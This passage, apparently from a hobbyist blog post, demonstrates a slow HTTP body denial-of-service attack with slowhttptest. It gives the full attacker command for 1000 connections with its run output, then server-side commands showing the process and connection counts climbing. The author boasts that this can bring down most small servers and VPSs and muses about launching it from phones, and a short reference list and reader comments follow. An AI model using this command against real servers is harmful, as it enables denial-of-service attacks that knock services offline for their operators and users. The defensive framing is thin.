From attackers end
So, I am collection stats and attacking www.localhost.com with 1000 connections.
root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3
Tue Sep 23 11:22:57 2014: slowhttptest version 1.6 - https://code.google.com/p/slowhttptest/ - test type: SLOW BODY number of connections: 1000 URL: http://www.localhost.com/ verb: FAKEVERB Content-Length header value: 8192 follow up data max size: 22 interval between follow up data: 110 seconds connections per seconds: 200 probe connection timeout: 3 seconds test duration: 240 seconds using proxy: no proxy Tue Sep 23 11:22:57 2014: slow HTTP test status on 85th second: initializing: 0 pending: 23 connected: 133 error: 0 closed: 844 service available: YES ^CTue Sep 23 11:22:58 2014: Test ended on 86th second Exit status: Cancelled by user CSV report saved to my_body_stats.csv HTML report saved to my_body_stats.html
From victim server end:
rootuser@localhost [/home]# pgrep httpd | wc -l 151
Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)
And of course I want to see how what’s in my
rootuser@someserver [/var/log]# tail -100 message | grep Firewall Sep 23 11:43:39 someserver: IP 126.96.36.199 (XX/Anonymous/1-2-3-4) found to have 504 connections
As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure).
To make it worse, you can do it from Windows, Linux and even a Mac… I am starting to wonder whether you can do it using a jailbroken iphone6 Plus OTA (4gplus is FAST) … or a Galaxy Note 4.. I can do it using my old Galaxy Nexus (rooted) and of course good old Raspberry Pi …
Further reading and references
- Slowhttptest in Google
- How I knocked down 30 servers using slowhttptest
- Slow Read DoS attack explained
- Test results of popular HTTP servers
- How to protect against slow HTTP DoS attacks
The logo is from http://openclipart.org/detail/168031/.
Thanks for sharing. I’ve never heard of slowhttptest before.
I was using apache benchmark tool (ab) for performance testing.
Pleasure. It was a random find in Googlecode and I liked the project for it’s potential. You can attack or use it as a benchmarking tool. (The way I see, they are both the same – just different user-intent).
Yes, I’ve used ab too, but it wasn’t very flexible. Cheers,